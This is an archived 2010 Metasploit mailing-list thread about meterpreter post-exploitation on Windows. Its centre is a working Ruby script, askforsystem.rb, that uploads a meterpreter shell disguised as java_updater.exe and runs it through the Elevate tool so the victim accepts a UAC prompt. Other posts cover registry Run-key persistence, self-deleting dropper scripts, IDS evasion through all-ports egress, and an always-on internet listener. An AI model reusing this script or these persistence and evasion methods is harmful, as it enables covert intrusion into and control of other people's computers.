Re: uploadexec and kitrap0d

[Rob Fuller <mubix () room362 com>]

Thats a pretty pimp script. Carlos? Some of the UAC checks would also be
handy in other scripts as well.

Nice work Devin!

--
Rob Fuller | Mubix
Room362.com | Hak5.org


On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch () gmail com> wrote:

> Kitrap0d never works in the wild, in my experience (too old now).  If
> you're into social engineering and the rules of engagement permit it, I
> wrote a cheap hack called askforsystem.rb.  Essentially, copies over a
> couple files from the "Elevate" Windows power tool, and a new shell.  It
> then executes the new shell with high IL privileges (which prompts the user
> with UAC).  I chose the name java_updater.exe for the new shell.  It's
> cheap, but it works more often than not.
>
> To use, copy all the files from the elevate power tool to your msf data
> directory (extract the archive first):
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
>
> Then copy a meterpreter shell executable named shell.exe into your msf data
> directory.  The name is hard-coded right now.  Sorry.
>
> Then save the following script to your meterpreter scripts directory as
> askforsystem.rb:
>
> ----- cut -----
> ######################################################
> # AskForSystem:  Bypass UAC by, well, asking for it                #
> ######################################################
> session = client
> host,port = session.tunnel_peer.split(':')
>
> def uaccheck(session)
>     uac = false
>     winversion = session.sys.config.sysinfo
>     if winversion['OS']=~ /(Vista|7)/
>         if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
>             print_status("Checking if UAC is enabled ...")
>             key =
> 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
>             root_key, base_key = session.sys.registry.splitkey(key)
>             value = "EnableLUA"
>             open_key = session.sys.registry.open_key(root_key, base_key,
> KEY_READ)
>             v = open_key.query_value(value)
>             if v.data == 1
>                 print_status("\tUAC is Enabled")
>                 uac = true
>             else
>                 print_status("\tUAC is Disabled")
>             end
>         end
>     end
>     return uac
> end
>
> def upload(session,file,fileontrgt)
>     location = session.fs.file.expand_path("%TEMP%")
>     fileontrgt = "#{location}\\" + fileontrgt
>     print_status("Uploading File #{file} ...")
>     session.fs.file.upload_file("#{fileontrgt}","#{file}")
>     print_status("Upload Complete ...")
>     return fileontrgt
> end
>
> def execute_as_system(session,file)
>     location = session.fs.file.expand_path("%TEMP%")
>     print_status("Running Commands ...")
>     session.sys.process.execute("cmd /c #{location}\\elevate
> #{location}\\#{file}", nil,{'Hidden' => true,'Channelized' => false})
> end
>
> if not uaccheck(session) then
>     print_status("UAC isn't running, don't bother...")
>     raise Rex::Script::Completed
> end
>
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell = File.join(Msf::Config.install_root, "data", "shell.exe")
>
> upload(session,elevatecmd,"elevate.cmd")
> upload(session,elevatevbs,"elevate.vbs")
> upload(session,shell,"java_updater.exe")
>
> sleep 1
>
> print_status("Executing shell as system...")
> execute_as_system(session,"java_updater.exe")
> ----cut----
>
> My ruby sucks, but you get the idea.  If someone wants to take the above
> script and add the appropriate railgun calls to ShellExecuteEx with the
> runas verb, be my guest.  Also keep in mind that UAC isn't that big of an
> obstacle to Pen Testing... you can still read all of the users data.  You
> can also still write to several directories in their profile (AppData is
> shown as the target above).  You can also make meterpreter persistent by
> writing to the HKCU\software\microsoft\windows\currentversion\run key.  But
> no hashes :(
>
> Invisible things lab blog has a great writeup of UAC here:
> http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html
> Especially relevant is the criticism that it doesn't protect any user data,
> it just prevents machines from being malware infested bots.
>
> Devin
>
>
>
>
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35 () yahoo com>wrote:
>
> > Just tried it. Working like a charm now. Uploaded and executed without a
> > problem.
> > I should be the one thanking you for sharing so much of your knowledge.
> > Your scripts rock and I have learned tons from reading you over the years.
> >
> > I also noticed the kitrap0d script didn't work on the win 7 machine,
> > probably all patched by now. I know that getprivs has gone through some
> > changes so what's the best script to run right off the bat when you have
> > meterpreter running as non-privileged user, before running scraper, hashdump
> > and the like?
> >
> >
> > cheers
> > --- On *Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com>*wrote:
> >
> >
> > From: Carlos Perez <carlos_perez () darkoperator com>
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35 () yahoo com>
> > Cc: framework () spool metasploit com
> > Date: Saturday, July 10, 2010, 1:45 PM
> >
> > svn up and give it a try now, it should be fixed. Thanks for reporting it
> >
> > On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
> >
> >  Thanks Carlos.
> > Here's the output: running against a win 7 7600 build (english) machine.
> >
> > meterpreter > run uploadexec -e /root/notepad.exe
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -o /Q
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -v
> > [*] Running Upload and Execute Meterpreter script....
> > [*]     Uploading /root/notepad.exe....
> > [*]     /root/notepad.exe uploaded!
> > [*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter >
> >
> > --- On *Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com<http://mc/compose?to=carlos_perez () 
> > darkoperator com>
> > > * wrote:
> >
> >
> > From: Carlos Perez <carlos_perez () darkoperator com<http://mc/compose?to=carlos_perez () darkoperator com>
> > >
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35 () yahoo com<http://mc/compose?to=miguelrios35 () yahoo com>
> > >
> > Cc: "Alex Polychronopoulos" <tweakier () gmail com<http://mc/compose?to=tweakier () gmail com>>,
> > framework () spool metasploit com<http://mc/compose?to=framework () spool metasploit com>
> > Date: Saturday, July 10, 2010, 12:49 PM
> >
> > Miguel
> >
> > Do send me the output of what your getting and the command it self and I
> > will take a look
> >
> > Cheers,
> > Carlos
> >
> > On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote
> >
> > Thanks. That explains it perfectly. For some reason I thought that
> > meterpreter would continuously try to connect back. Now I know I was wrong.
> > I had tried the loop option with VBS but the problem is that my custom
> > script is designed to delete itself after running the meterpreter binary, so
> > it obviously won't be there to respawn meterpreter. A bit of a catch 22.
> >
> > Thinking out loud, I could either schedule it to start every x minutes
> > (but you need to be admin to use the 'at' and 'schtasks' I believe) or have
> > it auto run at startup through the registry and have a listener permanently
> > set up on the internet listening and ready to run a bunch of scripts like
> > scraper, etc (by the way, any literature out there on setting up just
> > meterpreter listeners and scripts on a webserver or do I have to set up the
> > full MSF on the server?).
> >
> > Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It
> > wasn't a question of the exploited process dying since it's a standalone
> > meterpreter binary I'm playing with.
> >
> > Curious to see if there is any news or development regarding the all_ports
> > possibility for this payload, like with reverse_tcp. That would be super
> > stealth and highly effective at egressing the most restrictive networks.
> >
> > P.S. off topic here but I'm also having trouble with the uploadexec
> > script. I manage to upload my notepad.exe binary to %temp% but it doesn't
> > execute and the script spits out some error message about wrong count (4 of
> > 1 or something like that) or missing argument. Does this have something to
> > do with the -o switch? Is it mandatory? I just want my binary to be silently
> > executed but I must be missing something stupidly obvious. Time to sleep
> > maybe.
> >
> > --- On *Sat, 7/10/10, Alex Polychronopoulos <tweakier () gmail com>* wrote:
> >
> >
> > From: Alex Polychronopoulos <tweakier () gmail com>
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35 () yahoo com>
> > Cc: framework () spool metasploit com
> > Date: Saturday, July 10, 2010, 8:28 AM
> >
> > Meterpreter is designed to not persistently trying to connect back to the
> > handler, it tries once and then dies, so you're not doing something wrong.
> > What you can do here is try the msfencode -t loop_vbs option which converts
> > the payload into a vbscript and runs it every 5 seconds by default (you can
> > change this by editing the generated .vbs file).
> >
> > On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35 () yahoo com>wrote:
> >
> > >  Hi list,
> > > I've msfencoded a meterpreter reverse https payload using a win binary as
> > > a template. Everything seems to work fine when I test it in my XP SP3. I
> > > see the outbound connection and the process running, but after about a
> > > minute or so the process dies if there's no listener configured on the
> > > receiving end and doesn't respawn.
> > > What am I doing wrong here? I must be missing something obvious. Is there
> > > a timeout option for this reverse shell or a way to keep the process always
> > > running, even if it can't connect to the listener? Or is this due to
> > > msfencoding the payload somehow breaks it? I have tested that it does work
> > > properly when the listener is waiting for it, it's just the fact it timesout
> > > so quickly that is a pain.
> > >
> > > Also, saw the reverse_tcp allports payload and was wondering if there's a
> > > similar one for reverse meterpreter https. Ideally one could configure
> > > default ports to try 1st and then keep trying randomly the other 65000 or so
> > > to evade IDS. I know this would increase the payload size but it would be
> > > pretty stealth egress wise.
> > >
> > > Thanks. I do really love metasploit and the whole community behind it.
> > > You all rock.
> > >
> > > Miguel
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework